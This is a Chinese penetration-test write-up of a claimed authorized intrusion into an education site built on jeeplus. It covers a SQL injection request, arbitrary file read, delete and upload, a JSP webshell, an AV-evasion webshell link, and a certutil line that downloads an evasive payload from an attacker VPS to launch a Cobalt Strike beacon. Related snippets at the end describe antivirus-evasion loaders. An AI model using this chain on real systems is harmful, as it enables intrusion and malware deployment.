<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次曲折的獲取權限

    VSole2022-08-15 22:27:39

    0x01 前言

    碰到了一個對外宣傳是否安全的站點,但實際測試下來并不安全。不過在這次獲取權限的過程中還是有點曲折,記錄下來并分享給大家。

    整個測試過程均在授權的情況下完成,漏洞詳細已經提交并通告相關知情。

    0x02 過程

    1. 進入

    https://xxx.edu.cn/a/login,使用弱口令進行登陸

    2. 尋找上傳點

    進來后找到一處文件上傳的地方進行測試

    前端對上傳的文件類型做了初步校驗,這里我們上傳一個空文本后抓包

    發現路徑可以被操控,而且返回了絕對路徑。

    嘗試訪問后發現不能被解析只能下載。

    再次尋找上傳點,發現有頭像上傳的地方。這種上傳點一般都能被解析。

    上傳正常圖片

    返回了上傳成功的提示,但沒發現返回的地址。

    而后在個人資料出發現了圖片地址

    我們再次嘗試構造請求報文重發,這里直接將后綴改成 jsp 上傳成功

    刷新個人信息,找到訪問鏈接。發現仍然是只能下載。

    3. 突破口

    我在 Cookie 中發現 jeeplus 的字眼,嘗試搜索 getshell 方法

    發現早已有前輩做過代碼審計。

    1)SQL注入

    /a/sys/register/registerUser?roleName=wangba&mobile=13300990099\*&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on
    

    更具已有的 poc 進行嘗試 sqlmap 跑起來,*號的地方是注入點。

    通過 sqlmap 跑出來是 oracle 數據庫。嘗試一些查詢和提權無果放棄。注意,oracle 注入的 sql shell 只能做查詢語句。

    2)文件管理

    直接訪問 https://xxx.edu.cn/a/sys/file 就能越權進入到文件管理頁面

    這個目錄下面的文件都只能下載,我們對這里的文件上傳、刪除、下載都做了測試。

    a. 任意文件讀取

    下載接口可以返回文件內容,存在任意文件讀取。

    b.任意文件刪除

    這里甚至可以直接刪除文件夾

    c. 任意文件上傳

    這里可以自定義上傳路徑,如果路徑不存在則創建目錄并上傳。

    3)嘗試上傳文件到可解析目錄

    我第一時間想到上傳到 static 目錄,因為這個目錄是可以被直接訪問的。

    然后嘗試訪問仍然是 404。

    這里就是我沒有找到真確的路徑。想去官網直接下載源碼,點擊下載后回要求注冊,注冊之后也沒有發現哪里有下載源碼的地方。

    沒辦法就去凌風云網盤搜了一下,發現存在歷史的版本,我感覺差異應該不會那么大。

    挑了一個比較大文件的下載,解壓后可以查看目錄結構。

    看到有存放配置文件的地方,我想看看能不能通過讀取配置來找到絕對路徑。

    結果還是路徑不對。一番嘗試后無果,突然想起來站點的目錄還沒掃過,直接 dirsearch 來一波。

    當我看到掃出來 web.xml 這些配置文件我就知道有戲了。

    在 web.xml 中沒有發現東西,但是在 conf/server.xml 發現了站點的另一個路徑,我覺得這就是前端訪問的路徑。

    通過任意文件接口嘗試構造路徑 C:\tomcat\webapps\xxxx\WEB-INF\web.xml 發現有內容返回說明我找對了路徑,然后發現了 404.jsp 存放的路徑,對比我們之前拿到的源碼發現我們成功找對了路徑——上傳文件到 webpage 這個目錄絕對能解析。

    嘗試直接上傳 webshell。

    發現文件真實存在,但是沒有返回東西,我用任意文件讀取查看。

    4)免殺繞過WD檢測

    發現可能存在waf,但我后面對waf做了識別發現是 apache generic,這個不至于攔截我傳的。再用 nmap 對機器做識別發現是 window10,讓我想起了被 windows Defender支配的恐懼,不過這里我們找個命令免殺馬子上傳即可,找了一番之后用了以前 hw 碰到的一個馬子。

    https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/jsp/Runtime-reflect-cmd.jsp

    5)上線 CS

    成功上傳并執行命令,原本想通過 powershell 上線,但是嘗試過不同的命令包括免殺命令都不行。

    然后我通過遠程下載我的免殺馬子上線 CS

    certutil -urlcache -split -f http://VPS/免殺馬子.exe
    

    成功上線。

    代理出來之后進入桌面,發現果然開啟了 WD

    上機之后才知道,原來管理員把上傳文件夾路徑放到F盤,主體是C盤,估計就是怕內存不夠吧。

    0x03 總結

    碰到沒有思路的站點就做好信息收集擴大攻擊面。指紋識別、端口掃描、路徑掃描都是老生常談的了,這次還結合了公網網盤信息泄露的點,不然我還得繼續猜路徑。還有一點需要注意的是,測試的前提是取得相關授權

    注:如有侵權請聯系刪除

    免殺
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0X01起源在攻防演練中通過運行惡意代碼連接C2是最常用的手段,但是由于對抗程度的提升。以360、天擎為代表的毒軟件針對信任鏈的檢測,已經變得愈來愈成熟。這里我們可以理解為,攻擊者通過利用"白加黑"這種攻擊方法。當攻擊者通過社工釣魚的手段,使得目標下載惡意的文件到目標自己的計算機上,并點擊運行白文件時,該文件會在運行時執行惡意DLL。
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,作者的github保持更新,可以去瞅瞅。測試可以國內軟?注意:ShellCode 需要是64位的加載器將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處注意:保留原始ShellCode 里的雙引號 "示例:最終格式:打包成可執行程序編譯Python 3.8.6pyinstaller 4.7pip install pyinstaller
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender。代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,保持更新。
    技術有一套
    2022-07-20 09:45:45
    方式可能是上面的兩種方式,看情況。動態行為,運行中執行的某些行為被毒軟件攔截報讀。不同工具之前局別是使用的分割算法不同,查找特征碼的效果不同。
    ,又叫毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次就能完成了。
    方式可能是上面的兩種方式,看情況。動態行為,運行中執行的某些行為被毒軟件攔截報讀。不同工具之前局別是使用的分割算法不同,查找特征碼的效果不同。然后繼續測試另外的連鎖條件,直到找到最后一個連鎖條件,抹掉后,整個文件了,則說明特征代碼被定為完畢了,所以VIRTEST絕對可以精確的定位出所有的復合特征。直到定位到某個函數或者多個函數,進入3。有,單獨檢查該文件或者數據,方法從1開始。
    入門之靜態
    2022-04-30 06:53:30
    該工具已經被市面上軟加入病毒特征庫,我們的目標就是修改該程序特征碼并且不能影響其正常使用。最后測試mimikatz功能也是正常的,至此完成。
    一篇靜態的文章
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类